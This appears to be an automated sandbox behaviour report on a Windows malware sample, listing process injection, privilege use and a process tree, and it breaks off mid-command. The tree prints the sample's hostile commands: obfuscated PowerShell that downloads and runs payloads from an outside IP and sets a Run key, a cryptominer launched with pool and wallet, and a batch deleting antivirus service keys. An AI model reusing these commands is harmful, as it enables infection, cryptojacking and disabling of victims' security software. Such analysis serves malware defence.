e05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
92b685aedd90d350504624e142c53b24.exepid process 2884 92b685aedd90d350504624e142c53b24.exe 2884 92b685aedd90d350504624e142c53b24.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3036 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
92b685aedd90d350504624e142c53b24.exepid process 2884 92b685aedd90d350504624e142c53b24.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
C858.exeWerFault.exeWerFault.exeexplorer.exeDCEE.exeexplorer.exepowershell.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeDebugPrivilege 1160 C858.exe Token: SeRestorePrivilege 3980 WerFault.exe Token: SeBackupPrivilege 3980 WerFault.exe Token: SeDebugPrivilege 3980 WerFault.exe Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeDebugPrivilege 2772 WerFault.exe Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeDebugPrivilege 964 explorer.exe Token: SeDebugPrivilege 2960 DCEE.exe Token: SeDebugPrivilege 3180 explorer.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeDebugPrivilege 2948 WerFault.exe Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
BCCE.tmppid process 684 BCCE.tmp -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3036 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
92b685aedd90d350504624e142c53b24.exeBCCE.exeBCCE.tmpBCCE.exeBCCE.tmpCCDD.exeRuntimebroker.exedescription pid process target process PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 2016 wrote to memory of 2884 2016 92b685aedd90d350504624e142c53b24.exe 92b685aedd90d350504624e142c53b24.exe PID 3036 wrote to memory of 2296 3036 BCCE.exe PID 3036 wrote to memory of 2296 3036 BCCE.exe PID 3036 wrote to memory of 2296 3036 BCCE.exe PID 2296 wrote to memory of 1460 2296 BCCE.exe BCCE.tmp PID 2296 wrote to memory of 1460 2296 BCCE.exe BCCE.tmp PID 2296 wrote to memory of 1460 2296 BCCE.exe BCCE.tmp PID 1460 wrote to memory of 2208 1460 BCCE.tmp BCCE.exe PID 1460 wrote to memory of 2208 1460 BCCE.tmp BCCE.exe PID 1460 wrote to memory of 2208 1460 BCCE.tmp BCCE.exe PID 2208 wrote to memory of 684 2208 BCCE.exe BCCE.tmp PID 2208 wrote to memory of 684 2208 BCCE.exe BCCE.tmp PID 2208 wrote to memory of 684 2208 BCCE.exe BCCE.tmp PID 3036 wrote to memory of 1160 3036 C858.exe PID 3036 wrote to memory of 1160 3036 C858.exe PID 3036 wrote to memory of 1160 3036 C858.exe PID 3036 wrote to memory of 4000 3036 CCDD.exe PID 3036 wrote to memory of 4000 3036 CCDD.exe PID 3036 wrote to memory of 4000 3036 CCDD.exe PID 684 wrote to memory of 3864 684 BCCE.tmp fsucenter.exe PID 684 wrote to memory of 3864 684 BCCE.tmp fsucenter.exe PID 684 wrote to memory of 3864 684 BCCE.tmp fsucenter.exe PID 3036 wrote to memory of 2784 3036 D01A.exe PID 3036 wrote to memory of 2784 3036 D01A.exe PID 3036 wrote to memory of 2784 3036 D01A.exe PID 3036 wrote to memory of 2344 3036 D4FD.exe PID 3036 wrote to memory of 2344 3036 D4FD.exe PID 3036 wrote to memory of 2344 3036 D4FD.exe PID 3036 wrote to memory of 3360 3036 D78E.exe PID 3036 wrote to memory of 3360 3036 D78E.exe PID 3036 wrote to memory of 3360 3036 D78E.exe PID 4000 wrote to memory of 3776 4000 CCDD.exe Runtimebroker.exe PID 4000 wrote to memory of 3776 4000 CCDD.exe Runtimebroker.exe PID 4000 wrote to memory of 3776 4000 CCDD.exe Runtimebroker.exe PID 3036 wrote to memory of 2960 3036 DCEE.exe PID 3036 wrote to memory of 2960 3036 DCEE.exe PID 3036 wrote to memory of 2960 3036 DCEE.exe PID 3036 wrote to memory of 2296 3036 explorer.exe PID 3036 wrote to memory of 2296 3036 explorer.exe PID 3036 wrote to memory of 2296 3036 explorer.exe PID 3036 wrote to memory of 2296 3036 explorer.exe PID 3776 wrote to memory of 3296 3776 Runtimebroker.exe powershell.exe PID 3776 wrote to memory of 3296 3776 Runtimebroker.exe powershell.exe PID 3776 wrote to memory of 3296 3776 Runtimebroker.exe powershell.exe PID 3036 wrote to memory of 3100 3036 explorer.exe PID 3036 wrote to memory of 3100 3036 explorer.exe PID 3036 wrote to memory of 3100 3036 explorer.exe PID 3036 wrote to memory of 2288 3036 explorer.exe PID 3036 wrote to memory of 2288 3036 explorer.exe PID 3036 wrote to memory of 2288 3036 explorer.exe PID 3036 wrote to memory of 2288 3036 explorer.exe PID 3036 wrote to memory of 3180 3036 explorer.exe PID 3036 wrote to memory of 3180 3036 explorer.exe PID 3036 wrote to memory of 3180 3036 explorer.exe PID 3036 wrote to memory of 964 3036 explorer.exe PID 3036 wrote to memory of 964 3036 explorer.exe PID 3036 wrote to memory of 964 3036 explorer.exe PID 3036 wrote to memory of 964 3036 explorer.exe PID 3036 wrote to memory of 2512 3036 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exeC:\Users\Admin\AppData\Local\Temp\BCCE.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp"C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp" /SL5="$6005C,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exe"C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp"C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp" /SL5="$60058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XRAnpEIiD2.bat"8⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵
-
C:\Windows\twain_32\explorer.exe"C:\Windows\twain_32\explorer.exe"9⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\C858.exeC:\Users\Admin\AppData\Local\Temp\C858.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\CCDD.exeC:\Users\Admin\AppData\Local\Temp\CCDD.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete 